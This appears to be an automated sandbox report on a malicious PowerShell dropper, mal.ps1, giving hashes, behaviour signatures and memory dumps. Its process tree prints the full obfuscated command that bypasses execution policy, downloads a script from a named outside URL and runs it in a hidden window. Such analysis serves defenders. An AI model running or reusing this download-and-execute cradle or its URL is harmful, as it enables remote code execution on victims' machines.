Analysis

  • max time kernel
    122s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    20-01-2025 09:46

General

  • Target

    mal.ps1

  • Size

    477B

  • MD5

    106e8b1d646ba58948fa57cd919784b5

  • SHA1

    3c85495907a81aef34897e341703d2f7ad92a15b

  • SHA256

    572175d8c355a0e9e993eb3855fbb8b8aaac38ebb57eb14eb4757d52ec4605a7

  • SHA512

    a203b40d0b577f8e113c449520da60ad194e031be591132c6cbce38a7afa21fe4f6ea6cd88e27d4bdc42ec12acbb5861175be62a3b721968906f754a44d038ac

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

https://n.kliphirofey.shop/43cee3481683f8897547367aa517dd31.png

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\mal.ps1
    1⤵
    • Command and Scripting Interpreter: PowerShell
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2488
    • C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command 'Z8'|ForEach-Object{Set-Item Variable:/Z8 ([PowerShell]::Create())}{$Null=(Item Variable:Z8).Value.(($Z8|Get-Member)[5].Name).Invoke(((New-Object Net.WebClient).DownloadString('https://n.kliphirofey.shop/43cee3481683f8897547367aa517dd31.png')))}{(Item Variable:Z8).Value.Invoke()}{(Item Variable:Z8).Value.Dispose()}
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2416

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7AVOADWMFTUO003R536U.temp

    Filesize

    7KB

    MD5

    d1632232f428023d5c926618b41928e9

    SHA1

    c177cb380f3fa383b4e80d77c1e0cd9c01192cc5

    SHA256

    4e7a712dc81d0a212ad4de3eae933bbdaa115e08f61b6b783f0f1a6385eae740

    SHA512

    e1c62b62bd1a3951c9c189b57ff5c83dc601c847fac2e62db81eaeb402d69db35590c6d954775f598650fd07105c595e909f5f99f887453c3007fc43a66987b5

  • memory/2488-4-0x000007FEF5E6E000-0x000007FEF5E6F000-memory.dmp

    Filesize

    4KB

  • memory/2488-5-0x000000001B690000-0x000000001B972000-memory.dmp

    Filesize

    2.9MB

  • memory/2488-8-0x000007FEF5BB0000-0x000007FEF654D000-memory.dmp

    Filesize

    9.6MB

  • memory/2488-7-0x000007FEF5BB0000-0x000007FEF654D000-memory.dmp

    Filesize

    9.6MB

  • memory/2488-6-0x0000000002290000-0x0000000002298000-memory.dmp

    Filesize

    32KB

  • memory/2488-9-0x000007FEF5BB0000-0x000007FEF654D000-memory.dmp

    Filesize

    9.6MB

  • memory/2488-10-0x000007FEF5BB0000-0x000007FEF654D000-memory.dmp

    Filesize

    9.6MB

  • memory/2488-11-0x000007FEF5BB0000-0x000007FEF654D000-memory.dmp

    Filesize

    9.6MB

  • memory/2488-12-0x000007FEF5BB0000-0x000007FEF654D000-memory.dmp

    Filesize

    9.6MB